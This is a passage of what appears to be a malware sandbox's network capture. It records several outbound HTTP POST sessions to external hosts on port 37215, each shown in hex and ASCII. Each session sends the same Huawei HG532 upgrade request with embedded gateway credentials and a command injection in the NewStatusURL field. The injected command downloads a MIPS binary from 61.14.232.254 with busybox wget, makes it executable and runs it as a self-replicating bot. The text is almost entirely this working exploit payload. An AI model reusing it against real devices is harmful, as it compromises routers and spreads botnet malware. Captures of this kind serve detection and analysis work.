                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1481192.168.2.1338356157.169.56.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.572658062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1482192.168.2.1359186197.96.248.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.572668076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1483192.168.2.134358041.48.176.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.572686911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1484192.168.2.1340378157.170.91.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.572751999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1485192.168.2.134916241.170.62.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.572886944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1486192.168.2.1356284157.219.10.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.572901011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1487192.168.2.1358592197.74.207.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.575195074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1488192.168.2.1360776197.1.90.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.575588942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1489192.168.2.135110841.171.150.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.575692892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1490192.168.2.1342570157.254.7.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.575722933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
